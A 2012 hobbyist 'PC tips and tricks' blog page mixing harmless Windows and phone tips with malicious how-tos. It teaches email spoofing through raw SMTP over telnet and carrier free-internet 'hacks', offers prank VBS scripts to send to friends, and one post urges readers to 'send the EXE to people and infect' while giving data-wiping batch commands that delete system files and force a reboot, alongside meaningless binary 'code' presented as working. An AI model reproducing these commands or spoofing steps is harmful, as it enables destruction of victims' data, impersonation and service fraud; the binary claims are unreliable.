PC TIPS AND TRICKS

αℓℓ αяє ωєℓ¢σмє тσ συя ѕιтє:
נσιη υѕ αη∂ Ⴣαιℓє συя ѕєяνι¢єѕ
lyk us on fb to get updaed:

Friday 27 January 2012

Send fake emails from anonymous account...

Here, you will learn about sending fake emails...by using command prompt....

ok, step one to sending fake emails is to search for a mail server.

You can do this by:

1) open up Command Prompt

2) type 'nslookup' - because we are looking for something on the internet

2) type 'set q=mx' - this will well it to look for mail servers only

Now you have told the computer to search for mail servers. Next step is to tell it

what site you want it to search for mail servers.

So you now should have something like this on your screen:

_____________________________________________________________

Default Server: cache1.yourhost.com

Address: XXX.XXX.XXX.XXX

> set q=mx

>

_____________________________________________________________

Now type a name of a website or host, without using the www.

So to search for hotmail mail servers, you should type 'hotmail.com'.

Now a whole list of servers will be displayed.

This works for every website that has a mail server.

Now you have found your mail server, the next step is to fake a email.

To do this you need to:

1) Open Command Prompt - start > run > cmd

2) type 'telnet yourmailserver.com 25'- example "telnet mail.hotmail.com 25"

How you should have a blank screen if you are connected.

3) type 'hello' - this tells the mailserver to accept your connection

Now the server should respond with a welcome message, the message depends on which server your connected to.

So now you are connected you want to send your fake email!!

To do this you must specify who it's from, who it's too etc..

1) type 'MAIL FROM: email@email.com' - who the email is from

Now you should get a message: Sender ok

2) type 'RCPT TO: victim@victim.com' - who the email is sent to

Now you should get a message: Recipient ok

3) type 'DATA your email message' - this is the text thats in the email

4) type '.' - this ends the email message(Important..often neglected..)

Now you should get a message: 250 Mail accepted

5) type 'QUIT' - exits mail server and sends your email

an example would be:

_________________________________________________________________

>helo

Welcome XXX.XXX.XXX.XXX to our mail server

>MAIL FROM: example@server.com

Sender ok

>RCPT TO: victim@server.com

Recipient ok

>DATA hello you do not know who i am and i think you smell

>.

250 Mail accepted

>QUIT

Message Delivered
Read More

Again Airtel GPRS Hack! Browse Internet For Free

I really don't know whether this trick is working or not, but I found in some forums that members are posting that this trick is still working fine! IF you want to browse internet for free of cost using Airtel Live. All you need to have a free mobile browser Opera 4.2 or 5 Beta 2 and some GPRS setting in Airtel Live

IF your Airtel Live is not active, call the customer care and receive Airtel Live setting and configure according to their guidance.

Now download the following Opera mobile browser and install it in to your mobile.

Now you have have activated your Airtel Live and opera mini browner.

Now change the follow the instruction to configure your Airtel Live setting to surf freely

For s60 users:

Create a new access point and set
Access Point as airtelgprs.com
Proxy address= 80.239.242.253
Port= 80 (Remember its 80 not 8080)

Just try it on your mobile and share your feeback with us.
Read More

BSNL 3G Hack! Browse Internet at 120 Kbps For Free

Today I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them.



Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.

Just follow up the instruction:
Recharge your 2G SIM with Rs 1 to convert it to 3G SIM and use them for free hours
Check the balance by dialing *123#, the message will show that your GPRS free usage is ZERO MB
Now recharge again with Rs 1 to convert in to 2G SIM
Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM
Now again recharge with Rs 1 to convert in to 3G SIM
Thats it You have hacked your BSNL 3G for unlimited browsing check the GPRS free usage by dialing *123# it will show 1250000 MB free usage.
Read More

How to Create Funny Virus using Notepad..

How to Create Funny Virus using Notepad..
                        A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also used to refer to other types of malware and programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer.

                        Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.
Do you know that we can make simple viruses by using Notepad? Notepad is a simple but very powerful tool to make viruses. Let us have fun with some Viruses (developed on notepad).



1. Continuously pop out CD or DVD Drive:
Open Notepad and Type the following code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.


2. Type any message in notepad automatically and scare your friends :

Open Notepad and Type the following code :
WScript.Sleep 1800
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.

Read More

How hackers hack Facebook Account & How to stop them?

Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many hackers (or should I say crackers?) are actively involved in hacking Facebook accounts of unsuspecting users. This article outlines the many strategies that such hackers use to gain access to Facebook accounts of hundreds of users each day and how you can stop them from hacking your account.




Facebook is one of the prime target of hackers!
Email Address Hack

I have always been puzzled by Facebook's leniency in this matter. All a hacker needs to do is know your email address and he will be displayed a confirmation showing your name even if he enters the wrong password. How easily a hacker can then hack your Facebook account if he 'guesses' your password (if you use a weak password) or answers your security question! This is something I hope Facebook improves on quickly. Until Facebook does so, here are some tricks you can use to protect yourself from this vulnerability.

How to safeguard your Email Address?
Just follow these steps:-

1.Hide your Email Address from everyone by going to Edit Profile>Contact Information>Clicking on the icon beside your email address> checking 'Only Me'.
2.Change your primary email address to a one that is only known to you by going to Account Settings>Email> and changing your primary email to the new one (known only to you) and removing your previous email address.
3.For additional security, when in Account Settings, check 'Secure browsing' and 'Send me an email when a new computer or mobile device logs into this account' and click Save.




A hacker at work!
Phishing

Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is setup a webpage similar in design to that of the Facebook homepage, attach a server sided script to track the username and password entered and store it in a log. Sending people emails stating that someone tagged a photo of them on Facebook in the same format as Facebook and giving a link below to the phishing website further reduces the chances of it being detected as a fake. Sometimes, spam Facebook apps, like those promising to tell who viewed your Facebook profile, automatically post links to phishing websites. A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user's login credentials.

How to prevent yourself from being phished?
At all costs, avoid clicking on suspicious links. Moreover, always check the URL in the address bar before signing in. Avoid logging in through various "Facebook widgets" offered by websites and blogs. Instead, use Facebook's homepage to sign in. Always try to use Safe Search while searching. If you do manage to get phished, report the website so that others may get a warning before visiting it.




Keylogging through Keyloggers

Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim's computer. Keylogging gets more easy if the hacker has physical access to the victim's computer.

How to stop keyloggers?
Install a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-person's flash and pen drives before using them on your computer.

Detailed Guide:- PC Security tips to make computer secure

Social Engineering

Social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 12345678 to a hacker maliciously getting out the answer to your Security Question in a friendly chat or discussion.

How to prevent yourself from being socially engineered?
Stay aware during chats and discussions. Use a tough security question, preferably one whose answer you would never disclose to anyone. Moreover, Facebook, or any other company for that matter, will never ask you to change your password to 12345678 or do something as silly as asking you to send out your login details to prove that you are an active user. Always think before taking actions and your e-life on Facebook will be safe from hackers looking to hack Facebook accounts.
Read More

Cool Keyboard Tricks (Windows) : Make a Disco

Keyboards usually have small LED's which indicate whether different types of locks are activated or not. Here is a trick to use the lights of your keyboard in a more creative manner in Windows.

This trick uses a simple Visual basic script which when activated makes your scroll lock, caps lock and num locks LED's flash in a cool rhythmic way which gives the perception of a live disco on your keyboard.




To make your own live disco, follow the steps given below:-

1. Open Notepad.
2. Copy paste the exact code given below:-

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3. Save the file as Disco.vbs or "*.vbs".






Double click on the Saved file to see the LED lights on your keyboard go crazy and make your own cool disco.

This trick has been tested on Windows XP, Windows Vista and Windows 7 and found to be working perfectly.

You can disable the keyboard disco by starting Task Manager and ending the wscript.exe process.
Read More

Make your keyboard keys to type continuously (non-stop)

type the following in notepad!!!!!

MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Save it as “ghostrider.VBS”
Read More

Make your cd-drive MAD.

ou can make your cd-drive to open & close repeatedly by using a simple notepad tricks given below


Just Type the following code below in notepad :-

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as “im mad.VBS” .

now watch that your cd-drive has become MAD…!
Read More

Make your Computer Welcome You

Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.

Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-

Click on Start. Navigate to All Programs, Accessories and Notepad.
Copy and paste the exact code given below.
_____________________________________________________________________________________________
| Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
|
|
|_____________________________________________________________________________________________
3. Replace Username with your own name.
4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
5. Copy the saved file.
6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) or to C:\Users\ User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 7 and Windows Vista) if C: is your System drive.
7. Paste the file.

Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Note: For best results, it is recommended to change sound scheme to No Sounds.
You can change the sound scheme to No Sounds by following the steps given below:-
Go to Control Panel.
Then click on Switch to Classic View.
Then Click on Sounds and Audio Devices.
Then Click on the Sounds Tab.
Select No Sounds from the Sound Scheme option.
If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
Click on OK.


Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.
Read More

Thursday 26 January 2012

make your computer speaks

have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

To create one such talk script, follow the steps given below:-





Steps
Open Notepad.
Copy and paste the exact code given below.
Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message
3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
4. Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.

Now your Computer will speak / talk what you typed in Step 4. Try it yourself.

Windows Compatibility: This VBS file can be executed on all versions of Windows including Windows XP, Windows Vista and Windows 7.

Personal Experience: I personally showed this trick to many of my friends and they were literally left awestruck. You too can impress your friends by making your PC talk and be the Computer Wiz.
Read More

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports
Read More

Wednesday 25 January 2012

CHANGE YOUR IP IN 1 MINZZZZZZ!!!!!!!!!

This article will help you to change your IP address within a minute. Just follow the following step and you will be thru.

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.
Read More

FORMAT A HDD WITH NOTEPAD

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.


Step 1.
Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000


format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don't mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file
Read More

Enabling Remote Desktop in Windows 7/Vista

n this tutor we guide you, how to allow Windows 7 and Windows Vista Based systems to Enable and test the remote desktop systems.
Though the facility exists in these operating systems it is disabled in it by default(Vista buisness and enterprise editions are exceptions). The procedure to enable in both 7 and Vista are same.

Step by step procedure to Enable Remote Desktop

Step 1. Right-click Computer in the Start menu and then select Properties.
Step 2. Click Remote settings in the Tasks list on the left side of the System window.
Step 3. Select Allow connections from computers running any version of Remote Desktop if computers connecting to it will only be from within a local network or are running versions of Windows other than 7 or Vista.

Note: Here select Allow connections only from computers running Remote Desktop with Network Level Authentication if computers connecting to it will connect from the internet or all computers connecting will be Windows 7/Vista.

Step 4. Click OK to save your changes.

Note: If you’re using the Windows Vista firewall, Remote Desktop will automatically be allowed through it. If you’re using another firewall, you’ll need to open port 3389 to allow Remote Desktop connections.

Selecting Remote Desktop Users

If you have a user account(s) that do not have administrative credentials and you want to use to log in when connecting with Remote Desktop, follow these instructions.

Note: All user accounts with administrative rights are automatically allowed to log in using Remote Desktop.

1. Open the Remote tab in the System Properties window (see instructions above).

2. Click the Select Users button in the Remote tab of the System Properties window.

3. Click Add in the Remote Desktop Users window.

4. Click the Advanced button in the Select Users window.

5. Click the Find Now button.

6. Select the user you want to add to the list of users able to log in with Remote Desktop and then click OK.

7. Click OK in the Select Users window.

Note: Make sure the user you’ve just added is in the object names box.

8. Click OK in the Remote Desktop Users window.

9. Click OK in the System Properties window.
Read More

FORMATTING YOUR NOKIA MOBILE

Guys most of you should be using Symbian OS Mobiles in Nokia like Nseries and 6600 etc . .
However after a period of time , it will become damn slow and HANGS frequently and becomes annoying , so the only solution to restore it back to normal is to FORMAT it . .

Here are the steps to format :


1. First create a backup file in your PC using Nokia PC suite , because u will loose all ur data from MEMORY CARD , so its better you take a bach up in ur PC

2. Now you can format your Memory card just by
Menu -> Tools -> Memory -> option and then select "Format mem. card"

3. Again restore the BACKUP file from your PC to mobile using Nokia Pc Suite . .

4. Now your problem will be resolved and thats it . . .

-------------------------------------------------------------------------------------------------
Even after formatting your memory card , if ur cell keeps on hanging , then the only solution is to FORMAT your PHONE MEMORY

1. First create a backup file in your PC using Nokia PC suite , because u will loose all ur data from MEMORY CARD , so its better you take a bach up in ur PC

2. Now there are two kinds of Format , soft and hard format
*#7370# -- (soft format) (Always do this , if ur problem is not solved go to hard)
*#7780# -- (hard format

3. It will ask you for password and it is 12345 (default code) .

4. It will format your phone completely and now your symbian mobile will be fresh like u purchased from the shop . .

5. Again restore the BACKUP file from your PC to mobile using Nokia Pc Suite . .

6. Now your problem is solved . .


------------------------------------

Note :
1.Instead of formatting ur mobile , u can download the latest Firmware phone updates
and then connect ur phone with the sim in it with any general profile and run the update
it'll format as well as update ur phone and usually I ll do this trick . . . ..

2.Hard format clears the phone memory completing including the Secondary as well as the primary memory ... that is the storage memory and the RAM memory.. not a single setting or any trace of any kind of initial use can be noted ...

3.Soft format again formats completely but only for a few settings and information remains in the RAM memory and again when u re-insert ur MMC into the phone some softwares catch up with this saved files in the memory and they work perfectly normal . .
Read More
copyrightedPCTT ---sitemap